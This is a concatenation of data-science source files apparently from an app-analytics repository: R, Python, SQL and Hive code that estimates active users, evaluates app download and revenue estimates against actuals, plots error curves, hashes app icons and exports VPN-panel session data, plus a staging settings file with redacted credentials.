sample_size[[dev]][i,ind_rr,j,ind_zz] = ceiling((zz / error_prop)^2 * var * D / rr)
}
}
}
}
}
# return result
return(sample_size)
}
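
# Formula used above: n = ceiling( (z / e)^2 * p * (1 - p) * D / r ),
# with z the normal quantile for the confidence level, e the margin of
# error (absolute, or relative to p when perc=TRUE), p the average AU
# share, D the design effect and r the response (VPN usage) rate.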
#####################################
# select active devices for date dd #
#####################################
active_devices_date = function(dd){
devices_prior = unique(subset_connection_data[subset_connection_data$gmt_start_date < dd & subset_connection_data$gmt_start_date >= dd-7,'device_id'])
devices_after = unique(subset_connection_data[subset_connection_data$gmt_start_date > dd & subset_connection_data$gmt_start_date <= dd+3,'device_id'])
devices_paused = unique(subset_pause_data[subset_pause_data$gmt_pause_date == dd, 'device_id'])
devices_active = intersect(devices_prior,devices_after)
devices_final = setdiff(devices_active,devices_paused)
return(devices_final)
}
<file_sep>/ranking_change/concat.py
'''
Created on Aug 16, 2013
@author: perezrafael
'''
import pandas as pd
import os
def main():
path = '/Users/perezrafael/appannie/data_science/ranking_change/data'
dfs = []
for (dirpath, dirnames, filenames) in os.walk(path):
for filename in filenames:
if filename.endswith('_rank_change_alerts.csv'):
dfs.append(pd.read_csv(os.sep.join([dirpath, filename])))
dfs = pd.concat(dfs)
dfs.to_csv('data/all_alerts.csv', index=False)
if __name__ == '__main__':
main()<file_sep>/plotting/plot_errors.py
import datetime
import pandas as pd
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import config
import psycopg2
import numpy as np
import os
if not os.path.exists('plots/80_20'):
os.makedirs('plots/80_20')
CONN = None
def get_connection(db_name):
global CONN
if CONN is None:
CONN = psycopg2.connect('dbname=%s user=aa host=10.38.48.144'%db_name)
return CONN
def read_actuals(date, store_id, value_type, table_name):
conn = get_connection('aa_staging')
cur = conn.cursor()
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
params = (date, store_id)
print cur.mogrify(sql, params)
cur.execute(sql, params)
for app_id, value in cur:
yield {'app_id': app_id, value_type: value}
cur.close()
def read_weekly_estimates(end_date, store_id):
conn = get_connection('aa_est_weekly')
cur = conn.cursor()
sql = 'SELECT app_id, category_id, iphone_free, iphone_paid, iphone_revenue, ipad_free, ipad_paid, ipad_revenue FROM sbe_est_app WHERE end_date = %s AND store_id = %s'
params = (end_date, store_id)
print cur.mogrify(sql, params)
cur.execute(sql, params)
for app_id, category_id, iphone_free, iphone_paid, iphone_revenue, ipad_free, ipad_paid, ipad_revenue in cur:
yield {'app_id': app_id,
'category_id': category_id,
'iphone_free' : iphone_free,
'iphone_paid': iphone_paid,
'iphone_revenue': iphone_revenue,
'ipad_free': ipad_free,
'ipad_paid': ipad_paid,
'ipad_revenue': ipad_revenue}
cur.close()
def make_date_range(start_date_inclusive, end_date_inclusive):
assert start_date_inclusive <= end_date_inclusive
def create():
d = start_date_inclusive
while d <= end_date_inclusive:
yield d
d = d + datetime.timedelta(1)
return tuple(create())
def preprocess_metadata(df):
df['Category'] = df['category_id'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
del df['category_id']
df.rename(columns={'iphone_revenue':'iphone_grossing',
'ipad_revenue': 'ipad_grossing'},
inplace=True)
return df
FILTER_ACTUALS = (
('sales', 'revenue'),
('downloads', 'units'),
)
def get_errors(df):
df['downloads'] = df['iphone_free'] + df['iphone_paid'] + df['ipad_free'] + df['ipad_paid']
df['sales'] = df['iphone_grossing'] + df['ipad_grossing']
df['downloads_rel_error'] = (df['downloads'] - df['units']).abs()*1.0/df['units']
df['sales_rel_error'] = (df['sales'] - df['revenue']).abs()*1.0/df['revenue']
return df
def plot_80_20(df, type, unit, country, category):
########### Plot 80-20 curves ################
error_column = '%s_rel_error'%type
df = df.dropna(axis=0, subset=[error_column])
df = df.drop_duplicates(cols=['app_id'], take_last=True)
fig = plt.figure()
df = df.sort(unit, ascending=False)
df = df[:200]
print df
print df[:10]
ax = fig.add_subplot(111)
df = df.sort(error_column, ascending=True)
p1, = ax.plot(df[error_column], (np.arange(df.shape[0])*1.0/df.shape[0])*100.0, 'b-')
#ax.legend(loc='best')
title = '80-20_%s_%s_%s'%(country, category, type)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('%')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('plots/80_20/%s.png'%title)
#fig.close()
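
# Reading the 80-20 curves: each point (x, y) means that y% of the 200
# highest-selling apps have a relative estimation error of at most x, so a
# curve hugging the upper-left corner indicates better estimates.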
def plot_country(store_id_str = '143441'):
global CONN
dfs = []
#store_id_str = '143441'
country = config.IOS_STORES_DICT[int(store_id_str)]
DATES = make_date_range(datetime.date(2013, 8, 25), datetime.date(2013, 8, 31))
for date in DATES:
for (table_name, value_type) in FILTER_ACTUALS:
actuals_df = pd.DataFrame(list(read_actuals(date, int(store_id_str), value_type, table_name)))
if not len(actuals_df):
print 'no actuals for', date, store_id_str, value_type
continue
dfs.append(actuals_df)
end_date = date
actuals_df = pd.concat(dfs)
CONN.close()
CONN = None
actuals_df = actuals_df.groupby('app_id').sum().reset_index()
estimates_df = pd.DataFrame(list(read_weekly_estimates(end_date, int(store_id_str))))
CONN.close()
CONN = None
df = pd.merge(actuals_df, estimates_df, on=['app_id'], how='inner')
df = preprocess_metadata(df)
df = df.fillna(0.0)
df = get_errors(df)
#del df['Category']
df = df.drop_duplicates()
print df[:10]
for (type, unit) in FILTER_ACTUALS:
plot_80_20(df, type, unit, country, 'all')
for n, g in df.groupby('Category'):
plot_80_20(g, type, unit, country, n)
def main():
stores = ['143441', '143444', '143462', '143466', '143469' ]
for store in stores:
plot_country(store)
if __name__ == '__main__':
main()<file_sep>/evaluation/py/get_median_rank.py
"""
Concat the median rank (across date) in different categories and feeds.
This information is used in evaluation
"""
# Author: <NAME> <<EMAIL>>
import os
import sys
import pandas as pd
def main():
input_dir = sys.argv[1]
output_dir = sys.argv[2]
for f in filter(lambda s: s.endswith('.csv'), os.listdir(input_dir)):
full_path = os.path.join(input_dir, f)
df = pd.read_csv(full_path)
apps_median = _get_median_rank(df)
apps_median.to_csv(os.path.join(output_dir, f), index=False)
def _get_median_rank(df):
grouped = df.groupby(['app_id', 'category_id', 'feed_id'])['rank'].median()
agg = grouped.reset_index()
agg['median_rank'] = map(str, agg['rank'])
agg = agg.drop(['category_id', 'feed_id'], axis=1)
median_ranks = agg.groupby('app_id').aggregate({'median_rank': lambda x: ','.join(x)})
return median_ranks.reset_index()
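
# Illustrative example of the aggregation above: given ranks
#   app_id=1, category_id=36,   feed_id=0, rank in {3, 5, 9}
#   app_id=1, category_id=6014, feed_id=0, rank in {10, 12}
# the output holds one row per app, here app_id=1 with median_rank
# '5.0,11.0': one median per (category, feed) pair, joined by commas.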
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/hive_scripts/workflow/conf/settings.py
TEST = False
ENV = 'staging'
OPS_SERVER_HOST = 'stg-ops'
HDFS_MNT_PREFIX = '/mnt/hdfs'
HDFS_ROOT_PATH = '/user/aardvark'
HBASE_THRIFT_HOST = 'localhost'
STREAMING_JAR = '/home/hadoop/contrib/streaming/hadoop-streaming.jar'
REDIS_HOST = 'localhost'
REDIS_PORT = 6379
QUEUES = ['workflow']
EMR_KEY_PAIR_FILE = '/home/aardvark/id_rsa_emr.pem'
PG_DB_USER = 'awsuser'
PG_DB_PASSWD = '<PASSWORD>'
PG_DB_HOST = 'stg-rdb-1.cnrzhjm9iivh.us-east-1.rds.amazonaws.com'
PG_DB_PORT = 5432
PG_DB_NAME_A = 'stg_rdb_1'
PG_DB_NAME_B = 'report_ui'
APPANNIE_API_KEY = '<KEY>'
VPN_RADIUS_DB_HOST = 'radius-staging.cnrzhjm9iivh.us-east-1.rds.amazonaws.com'
VPN_RADIUS_DB_PORT = 5432
VPN_RADIUS_DB_USER = 'radius'
VPN_RADIUS_DB_PWD = '<PASSWORD>'
VPN_RADIUS_DB_USERINFO = 'radius'
WORKFLOW_LOG_PATH = '/home/aardvark/log'
API_HOST = 'https://report-stg.smart-sense.org'
API_AUTH = ('a8k', '<PASSWORD>')
AWS_ACCESS_KEY_ID = '<KEY>'
AWS_SECRET_ACCESS_KEY = '<KEY>'
S3_BIG_UPLOAD_BUCKET = 'aardvark-stg-big-upload'
ZK_HOST = 'stg-nn-1,stg-mgt,stg-nn-2'
ZK_PORT = '2181'
DPI_RESULT_S3_BUCKET = 'aardvark-stg-ds-sample'
DPI_RESULT_S3_ACCESS_KEY = '<KEY>'
DPI_RESULT_S3_SECRET_KEY = '<KEY>'
DPI_RESULT_S3_HOST = 's3.amazonaws.com'
DATA_S3_BUCKET='aardvark-stg-data'
<file_sep>/google-analytics/constant/constant.py
# Constants for 2015 Q1.
# An updated version exists that changes the Japan and Worldwide device populations.
total_users = {'Android Mobile': {'US':105539388, 'GB':16626811, 'JP':29831382},
'iPhone': {'US':96551128, 'GB':15584322, 'JP':24991269},
'Android Tablet': {'US':41354977, 'GB':5655112, 'JP':9860209},
'iPad': {'US':36956810, 'GB':7289178, 'JP':8632028}
}
<file_sep>/sbe_benchmark/analyze_estimates_ios.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import os
import config
import datetime
import sys
import itertools
import bz2
import psycopg2
start_date = datetime.date(2013, 7, 1)
end_date = datetime.date(2013, 8, 1)
PLATFORM = 'ios'
PERIOD = '2013-07'
WEBUI_DAILY = '/Users/perezrafael/appannie/data/estimates_daily-2013-07'
MONTHLY = '/Users/perezrafael/appannie/data/estimates_monthly_2013-07'
DAILY_7_DAYS = '/Users/perezrafael/appannie/data/estimates_7_days'
DB_ACTUALS_STRING = 'dbname=aa_staging user=aa host=nile'
DB_EVENTS_STRING = 'dbname=aa user=aa host=nile'
#DB_ACTUALS_STRING = 'dbname=aa_staging user=aa host=10.38.48.144 port=5432'
#DB_EVENTS_STRING = 'dbname=aa user=aa host=10.38.48.134 port=6432'
COMPRESSED_RANKING_FILES_PATH = '/Users/perezrafael/appannie/data/ranks' if len(sys.argv) != 2 else sys.argv[1]
#COMPRESSED_RANKING_FILES_PATH = '/mnt/data/ranks' if len(sys.argv) != 2 else sys.argv[1]
if not os.path.isdir(COMPRESSED_RANKING_FILES_PATH):
print 'Expecting compressed ranking files in directory %s' % COMPRESSED_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
CONN = None
def get_connection(conn_string):
global CONN
if CONN is None:
CONN = psycopg2.connect(conn_string)
return CONN
ipad_feeds = {'100': '1',
'101': '0',
'102': '2'}
reverse_ipad_feeds = {'1': '100',
'0': '101',
'2': '102'}
ALL_FEEDS = {'0': '0',
'1': '1',
'2': '2',
'100': '1',
'101': '0',
'102': '2'
}
ESTIMATES_FEED_ID = {1000: '0',
1001: '1',
1002: '2'}
def load_ranks_file(path, store_ids=None, ranking_category_str_filter=None):
filename = os.path.split(path)[1]
assert filename.startswith('ranking_')
assert filename.endswith('.sql.bz2')
filename_date_str = filename[len('ranking_'):-len('.sql.bz2')]
filename_date = datetime.datetime.strptime(filename_date_str, '%Y-%m-%d').date()
ranking_feed_str_filter = frozenset(map(str, config.IOS_MARKETS_DICT.keys()))
if ranking_category_str_filter is None:
ranking_category_str_filter = frozenset(map(str, config.IOS_CATEGORIES_DICT.keys()))
else:
ranking_category_str_filter = frozenset(ranking_category_str_filter)
#f = open(path, 'r' )
f = bz2.BZ2File(path, 'r')
iphone_dfs = []
ipad_dfs = []
for line in f:
assert line.startswith(filename_date_str)
line_split = line.split('\t')
ranking_date_str, ranking_store_str, ranking_category_str, ranking_feed_str, ranking_list_str_unsplit = line_split
if ranking_store_str not in store_ids:
continue
if ranking_feed_str not in ranking_feed_str_filter:
continue
if ranking_category_str not in ranking_category_str_filter:
continue
store_id = ranking_store_str
category_id = ranking_category_str
feed_id = ranking_feed_str
assert ranking_list_str_unsplit.endswith('\n')
ranking_list_str_split = ranking_list_str_unsplit.rstrip().split(' ')
df = pd.DataFrame(ranking_list_str_split).reset_index()
df.rename(columns={0:'app_id', 'index':'rank'}, inplace=True)
df['rank'] += 1
df['date'] = ranking_date_str
df['store_id'] = store_id
df['category_id'] = category_id
if int(feed_id) < 100:
#df.rename(columns={'rank': 'iphone_rank'}, inplace=True)
iphone_dfs.append(df)
df['feed_id'] = feed_id
else:
#df.rename(columns={'rank': 'ipad_rank'}, inplace=True)
ipad_dfs.append(df)
df['feed_id'] = feed_id
f.close()
iphone_dfs = pd.concat(iphone_dfs)
ipad_dfs = pd.concat(ipad_dfs)
iphone_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']] = iphone_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']].astype(str)
ipad_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']] = ipad_dfs[['app_id', 'date', 'store_id', 'category_id', 'feed_id']].astype(str)
#print iphone_dfs
#print ipad_dfs
#return iphone_dfs.merge(ipad_dfs, on=['app_id', 'date', 'store_id', 'category_id', 'feed_id'], how='outer')
return pd.concat([iphone_dfs, ipad_dfs])
def read_actuals(date, store_id, value_type, table_name, ranked_apps=None):
conn = get_connection(DB_ACTUALS_STRING)
cur = conn.cursor()
if ranked_apps is None:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s' % (value_type, table_name)
params = (date, store_id)
else:
sql = 'SELECT app_id, %s FROM %s WHERE date = %%s AND store_id = %%s AND app_id = ANY(%%s)' % (value_type, table_name)
params = (date, store_id, ranked_apps)
cur.execute(sql, params)
#print cur.mogrify(sql, params)
for app_id, value in cur:
yield {'app_id': app_id, table_name: value}
cur.close()
def get_actuals(store_ids, DATES, table_name, value_type, ranked_apps=None):
result = []
for store_id, single_date in itertools.product(store_ids, DATES):
df = pd.DataFrame(list(read_actuals(single_date, int(store_id), value_type, table_name, ranked_apps)))
df['date'] = single_date.strftime('%Y-%m-%d')
df['store_id'] = store_id
result.append(df)
result = pd.concat(result)
result[['app_id', 'date', 'store_id']] = result[['app_id', 'date', 'store_id']].astype(str)
return result
def load_daily_estimates(DATES, dir, store_id, model_name):
estimates_df = []
for single_date in DATES:
file = '%s/estimates_daily_%s_%s_%s.csv.bz2'%(dir, PLATFORM, store_id, single_date.strftime('%Y-%m-%d'))
print 'loading %s'%file
df = pd.read_csv(file, compression='bz2')
estimates_df.append(df)
estimates_df = pd.concat(estimates_df)
estimates_df['feed_id'] = estimates_df['feed_id'].apply(lambda x: ESTIMATES_FEED_ID[x])
estimates_df.rename(columns={'estimate': 'estimate_%s'%model_name}, inplace=True)
estimates_df[['app_id', 'date', 'store_id']] = estimates_df[['app_id', 'date', 'store_id']].astype(str)
return estimates_df
def load_ranks(DATES, path, store_id, category_ids):
ranks_df = []
for single_date in DATES:
file = '%s/ranking_%s.sql.bz2'%(path, single_date.strftime('%Y-%m-%d'))
print 'loading %s'%file
df = load_ranks_file(file, [store_id], category_ids)
ranks_df.append(df)
ranks_df = pd.concat(ranks_df)
ranks_df['feed_id'] = ranks_df['feed_id'].apply(lambda x: ALL_FEEDS[x])
return ranks_df
def get_errors(df, model_names):
for model_name in model_names:
df['abs_error_%s'%model_name] = (df['actual'] - df['estimate_%s'%model_name]).abs()
df['rel_error_%s'%model_name] = df['abs_error_%s'%model_name] / df['actual']
return df
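
# Both plot_8020 and generate_summary below first sort apps by actuals and
# tag them with rank buckets ('1 to 10', '11 to 20', '21 to 200',
# '201 to end'), so accuracy can be judged separately for the head and the
# tail of each store/category/feed.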
def plot_8020(df, model_names, groupby):
df = df.dropna(subset=['actual'])
df2 = []
for n, g in df.groupby(groupby):
g = g.sort('actual', ascending=False)
g['range'] = '201 to end'
g['range'][:200] = '21 to 200'
g['range'][:20] = '11 to 20'
g['range'][:10] = '1 to 10'
df2.append(g)
df = pd.concat(df2)
del df2
groupby.append('range')
for n, g in df.groupby(groupby):
fig = plt.figure()
ax = fig.add_subplot(111)
for model_name in model_names:
g.sort('rel_error_%s'%model_name, ascending=True, inplace=True)
t_under_20 = int((float(g[g['rel_error_%s'%model_name]<=0.2].shape[0])/float(g.shape[0]))*100.0)
ax.plot(g['rel_error_%s'%model_name], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, '-', label='%s %% - %s'%(t_under_20, model_name))
print n
ax.legend(loc=4)
title = '8020 %s %s %s'%(PLATFORM, PERIOD, str(n))
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
fig.savefig('data/plots/%s.png'%title)
plt.close()
def make_human_readable(df):
if PLATFORM=='ios':
df['store_id'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[int(x)])
#df['feed_id'] = df['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[int(x)])
df['category_id'] = df['category_id'].apply(lambda x: config.IOS_CATEGORIES_DICT[int(x)])
return df
def generate_summary(df, groupby, model_names):
df = df.dropna(subset=['actual'])
df2 = []
for n, g in df.groupby(groupby):
g = g.sort('actual', ascending=False)
g['range'] = '201 to end'
g['range'][:200] = '21 to 200'
g['range'][:20] = '11 to 20'
g['range'][:10] = '1 to 10'
df2.append(g)
df = pd.concat(df2)
del df2
groupby.append('range')
summary = []
for n, g in df.groupby(groupby):
d = g.describe()
s = pd.Series()
s.name = '%_apps_under_20%_error'
d = d.append(s)
s.name = 'best_case'
d = d.append(s)
max = 0
min_error = 100
for model_name in model_names:
t_under_20 = float(g[g['rel_error_%s'%model_name]<=0.2].shape[0])/float(g.shape[0])
d['rel_error_%s'%model_name]['%_apps_under_20%_error'] = t_under_20
if t_under_20 > max:
d.loc['best_case'] = 0
d['rel_error_%s'%model_name]['best_case'] = 1
max = t_under_20
min_error = d['rel_error_%s'%model_name]['mean']
elif t_under_20 == max:
if d['rel_error_%s'%model_name]['mean'] < min_error:
d.loc['best_case'] = 0
d['rel_error_%s'%model_name]['best_case'] = 1
min_error = d['rel_error_%s'%model_name]['mean']
i = 0
for gb in groupby:
d[gb] = n[i]
i += 1
d['platform'] = PLATFORM
d['period'] = PERIOD
summary.append(d)
summary = pd.concat(summary)
stores = str(summary['store_id'].drop_duplicates().values)
summary.loc[['best_case']].to_csv('data/summary_best-case-only_%s_%s_%s.csv'%(PLATFORM, PERIOD, stores))
summary.to_csv('data/summary_full_%s_%s_%s.csv'%(PLATFORM, PERIOD, stores))
return summary
def process_single_country(store_id, DATES):
global CONN
path = COMPRESSED_RANKING_FILES_PATH
    category_ids = map(str, config.IOS_CATEGORIES_DICT.keys())
    #category_ids = ['36']
model_names = ['webui', '7-days']
webui_estimates = load_daily_estimates(DATES, WEBUI_DAILY, store_id, 'webui')
seven_day_estimates = load_daily_estimates(DATES, DAILY_7_DAYS, store_id, '7-days')
estimates_df = webui_estimates.merge(seven_day_estimates, on=['date', 'store_id', 'feed_id', 'app_id'])
del webui_estimates
del seven_day_estimates
estimates_df = estimates_df.drop_duplicates()
ranked_apps = list(map(int, estimates_df['app_id'].drop_duplicates().values))
CONN = None
downloads_df = get_actuals([store_id], DATES, 'downloads', 'units', ranked_apps)
downloads_df = downloads_df.merge(estimates_df[(estimates_df['feed_id']=='0') | (estimates_df['feed_id']=='1')], on=['date', 'store_id', 'app_id'])
downloads_df['feed_id'] = 'Downloads'
downloads_df.rename(columns={'downloads': 'actual'}, inplace=True)
sales_df = get_actuals([store_id], DATES, 'sales', 'revenue', ranked_apps)
sales_df = sales_df.merge(estimates_df[estimates_df['feed_id']=='2'], on=['date', 'store_id', 'app_id'])
sales_df['feed_id'] = 'Revenue'
sales_df.rename(columns={'sales': 'actual'}, inplace=True)
del estimates_df
final_df = pd.concat([downloads_df, sales_df])
del sales_df
del downloads_df
del ranked_apps
ranks_df = load_ranks(DATES, path, store_id, category_ids)
categories_df = ranks_df[['date', 'store_id', 'category_id', 'app_id']].drop_duplicates()
del ranks_df
final_df = final_df.merge(categories_df, on=['date', 'store_id', 'app_id'])
#daily_df = get_errors(final_df, model_names)
#daily_df = make_human_readable(daily_df)
#bydate = ['store_id', 'category_id', 'feed_id', 'date']
#plot_8020(daily_df, model_names, groupby=bydate, top=20)
#plot_8020(daily_df, model_names, groupby=bydate, top=200)
#plot_8020(daily_df, model_names, groupby=bydate, top='All')
#del daily_df
monthly_df = final_df.groupby(['store_id', 'category_id', 'feed_id', 'app_id']).sum().reset_index()
monthly_estimates = pd.read_csv('%s/%s_sbe_est_app_unique_2013_07.csv.bz2'%(MONTHLY, PLATFORM), compression='bz2', sep='\t')
monthly_estimates[['app_id', 'store_id']] = monthly_estimates[['app_id', 'store_id']].astype(str)
monthly_estimates = monthly_estimates[monthly_estimates['store_id']==store_id]
monthly_estimates['sales'] = monthly_estimates['iphone_revenue'] + monthly_estimates['ipad_revenue']
monthly_estimates['downloads'] = monthly_estimates['iphone_free'] + monthly_estimates['ipad_free'] + monthly_estimates['iphone_paid'] + monthly_estimates['ipad_paid']
downloads_df = monthly_estimates[['store_id', 'app_id', 'downloads']].merge(monthly_df[monthly_df['feed_id']=='Downloads'], on=['store_id', 'app_id'])
downloads_df.rename(columns={'downloads': 'estimate_monthly'}, inplace=True)
sales_df = monthly_estimates[['store_id', 'app_id', 'sales']].merge(monthly_df[monthly_df['feed_id']=='Revenue'], on=['store_id', 'app_id'])
sales_df.rename(columns={'sales': 'estimate_monthly'}, inplace=True)
monthly_df = pd.concat([downloads_df, sales_df])
del monthly_estimates
del sales_df
del downloads_df
model_names = ['webui', '7-days', 'monthly']
monthly_df = get_errors(monthly_df, model_names)
monthly_df = make_human_readable(monthly_df)
bymonth = ['store_id', 'category_id', 'feed_id']
generate_summary(monthly_df, bymonth, model_names)
#bymonth = ['store_id', 'category_id', 'feed_id']
#plot_8020(monthly_df, model_names, groupby=bymonth)
def daterange(start_date, end_date):
result = []
for n in range(int ((end_date - start_date).days)):
result.append(start_date + datetime.timedelta(n))
return result
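# e.g. daterange(date(2013, 7, 1), date(2013, 8, 1)) yields the 31 days of
# July 2013; the end date itself is excluded.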
def main():
# Debug subsets, kept for reference but overridden below:
#store_ids = ['143441', '143465', '143462', '143444']
#store_ids = ['143441']
store_ids = map(str, config.IOS_STORES_DICT.keys())
DATES = daterange(start_date, end_date)
print DATES
for store_id in store_ids:
if int(store_id) < 143604:
continue
print store_id, DATES
try:
process_single_country(store_id, DATES)
except Exception as e:
print 'Failed to process store %s: %s' % (store_id, e)
if __name__ == '__main__':
main()
<file_sep>/tooling/FunctionController/lib/constants.py
__author__ = 'srhmtonk'
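# Collects, per (week, country, device, feed type, category), the fitted curve
# model, the weekly average rank data, and the maximum rank observed that week
# (derived from the space-separated rank list stored in daily_ranks.data).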
COLLECT_CURVE_MODELS = """
SELECT
x.end_date,
cm.iso_code,
fdtm.device_id,
fdtm.type,
cgm.distimo_name as category,
x.max_rank,
c.data as model,
r.data as weekly_avg
FROM(
SELECT
MIN(date) as start_date,
MAX(date) as end_date,
t.feed,
t.store_id,
t.category_id,
max((length(data)-length(replace(data,' ','')))+1) as max_rank
FROM
aa_benchmarking_ios.daily_ranks t
group by WEEK(date),t.store_id,t.category_id,t.feed
) x
JOIN aa_benchmarking_ios.curve c
USING(store_id,category_id,feed,start_date,end_date)
JOIN aa_benchmarking_ios.country_mappings cm
USING(store_id)
JOIN aa_benchmarking_ios.category_mappings cgm
ON x.category_id = cgm.appannie_category_id
JOIN aa_benchmarking_ios.feed_device_type_mappings fdtm
USING(feed)
JOIN aa_benchmarking_ios.rank_data r
USING(store_id,category_id,feed,start_date,end_date)
ORDER BY end_date,iso_code,device_id,type,category
"""
<file_sep>/exact-matching-improvement/icon_lib/preprocessing.py
"""
Module for icon preprocessing, uses function icon_processing.process_local_icon for actual processing. Main functions:
- preprocess_icons_from_disk: Preprocess all matched icons from disk.
See constants.py for constants.
"""
__author__ = 'hgriffioen'
import functools
import icon_processing
import pandas as pd
from multiprocessing import Pool
from config import (DEFAULT_HASH_SIZE, DEFAULT_HASH_TYPE, DEFAULT_HASHING_POOL_SIZE)
def preprocess_icons_from_disk(matched_apps, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE,
workers=DEFAULT_HASHING_POOL_SIZE):
"""
Preprocess icons for all matched apps from disk.
:param matched_apps: DataFrame with matched apps
:param hash_type: Hash type
:param hash_size: Hash size
:param workers: Number of workers to hash with (if 0, hash sequentially)
:return: DataFrame with hashes for matched apps
"""
if workers == 0:
matched_apps = sequential_icon_preprocessing(matched_apps, hash_type, hash_size)
else:
matched_apps = parallel_icon_preprocessing(matched_apps, hash_type, hash_size, workers=workers)
return matched_apps
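# Minimal usage sketch (the input frame here is hypothetical; icons are expected
# on disk under icons/<market>/<app_id>, see get_local_icon_path below):
#
# import pandas as pd
# apps = pd.DataFrame({'market': ['ios'], 'app_id': [123456789]})
# hashed = preprocess_icons_from_disk(apps, workers=0)
# print hashed[['hex', 'avg_r', 'avg_g', 'avg_b']]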
def sequential_icon_preprocessing(matched_apps, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE):
"""
Preprocess matched apps in a single process.
:param matched_apps: DataFrame with matched apps
:param hash_type: Hash type
:param hash_size: Hash size
:return: DataFrame matched_apps with hashes added in hex and average colors in avg_*
"""
matched_apps['hex'] = ''
matched_apps['avg_r'] = None
matched_apps['avg_g'] = None
matched_apps['avg_b'] = None
for ix, current_app in matched_apps.iterrows():
# iterrows() yields index labels, so write back with .loc rather than .iloc
matched_apps.loc[ix] = preprocess_single_icon_from_disk(current_app, hash_type=hash_type, hash_size=hash_size)
return matched_apps
def parallel_icon_preprocessing(matched_apps, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE,
workers=DEFAULT_HASHING_POOL_SIZE):
"""
Preprocess matched apps using multiple workers for multi-processing.
:param matched_apps: DataFrame with matched apps
:param hash_type: Hash type
:param hash_size: Hash size
:param workers: Number of workers to hash with
:return: DataFrame matched_apps with hashes added in hex and binary format and average colors in avg_*
"""
pool = Pool(workers)
matched_app_list = [matched_app for ix, matched_app in matched_apps.iterrows()]
matched_app_list = pool.map(functools.partial(preprocess_single_icon_from_disk, hash_type=hash_type,
hash_size=hash_size), matched_app_list)
return pd.concat(map(lambda x: pd.DataFrame(x).T, matched_app_list))
def preprocess_single_icon_from_disk(matched_app, hash_type=DEFAULT_HASH_TYPE, hash_size=DEFAULT_HASH_SIZE):
"""
Preprocess single matched app.
:param matched_app: Series with one app
:param hash_type: Hash type
:param hash_size: Hash size
:return: Series with hash for matched app
"""
icon_path = get_local_icon_path(matched_app['market'], matched_app['app_id'])
results = icon_processing.process_local_icon(icon_path, hash_type, hash_size)
matched_app['hex'] = results['hash']
matched_app['avg_r'] = results['avg_r']
matched_app['avg_g'] = results['avg_g']
matched_app['avg_b'] = results['avg_b']
return matched_app
def get_local_icon_path(market, app_id):
"""
Construct path for loading icon from disk.
:param market: Market ID
:param app_id: App ID
:return: path to icon
"""
if not isinstance(market, basestring):
market = str(market)
return '/'.join(('icons', market, str(app_id)))<file_sep>/aa_au_model/README.md
aa-au-model
===========
A model that estimates active users for apps over a specified time frame.
<file_sep>/top-app-stability/Distimo_data_queries/iOS_calculate_mapd.sql
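-- MAPD here is the mean absolute percentage difference between an estimate and
-- the previous week's estimate at the same rank, averaged per country, feed,
-- week and rank bucket (1, 2-5, 6-15, 16-50).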
DROP TEMPORARY TABLE IF EXISTS temp.zap;
CREATE TEMPORARY TABLE temp.zap
select
'ios' as platform,
a.iso_code,
a.feed,
a.start_date,
CASE
WHEN a.rank = 1 THEN '1'
WHEN a.rank >=2 and a.rank <= 5 THEN '2-5'
WHEN a.rank >=6 and a.rank <= 15 THEN '6-15'
ELSE '16-50'
END as rank_bucket,
avg(abs((a.estimate - b.estimate) / b.estimate)) as mapd
from
aa_benchmarking_ios.stability_weekly_aggregated a
join aa_benchmarking_ios.stability_weekly_aggregated b on
a.feed = b.feed and a.start_date = date_add(b.start_date, interval 1 week) and a.rank = b.rank and a.iso_code = b.iso_code
group by
iso_code, feed, start_date, rank_bucket
;
insert into aa_benchmarking_ios.stability_mapd
select
*
from
temp.zap
;<file_sep>/aa_au_model/hive_ql/export_devices_few_connections.sql
set hive.auto.convert.join = true;
set hive.exec.dynamic.partition = true;
set start_date = '2015-05-01';
set end_date = '2015-05-08';
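-- The quotes are part of the values: ${hiveconf:...} substitution is textual,
-- so the datestr comparisons below receive proper string literals.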
-- Get unique iOS devices
drop table if exists ios_devices;
create table ios_devices
as
select
device_id
from
vpn_new_device_info
where
platform = 'iOS'
group by
device_id
;
-- Get VPN connections
drop table if exists nr_vpn_connections;
create table nr_vpn_connections
as
select
datestr,
device_id,
count(*) as nr_connections
from
vpn_sample_data_connection_session
where
datestr between ${hiveconf:start_date} and ${hiveconf:end_date}
group by
datestr,
device_id
;
-- Get bundle_ids for iOS devices with a small number of VPN connections
drop table if exists device_few_connections_bundleid;
create table device_few_connections_bundleid
as
select
s.datestr,
s.device_id,
s.bundleid,
count(*) as nr_sessions,
min(endtime - starttime)/1000 as min_session_duration,
max(endtime - starttime)/1000 as max_session_duration
from
nr_vpn_connections nc
join ios_devices d
on nc.device_id = d.device_id
join vpn_sample_data_session s
on nc.datestr = s.datestr
and nc.device_id = s.device_id
where
nc.nr_connections <= 5
group by
s.datestr,
s.device_id,
s.bundleid
;
-- export data
drop table if exists device_few_connections_bundleid_export;
create table device_few_connections_bundleid_export (
datestr string,
device_id string,
bundleid string,
nr_sessions int,
min_session_duration int,
max_session_duration int)
row format delimited fields terminated by '\t'
lines terminated by '\n'
stored as textfile
location 's3://aardvark-prod-pdx-ds-workspace/device_few_connections_bundleids'
;
insert overwrite table device_few_connections_bundleid_export
select
datestr,
device_id,
bundleid,
nr_sessions,
min_session_duration,
max_session_duration
from
device_few_connections_bundleid
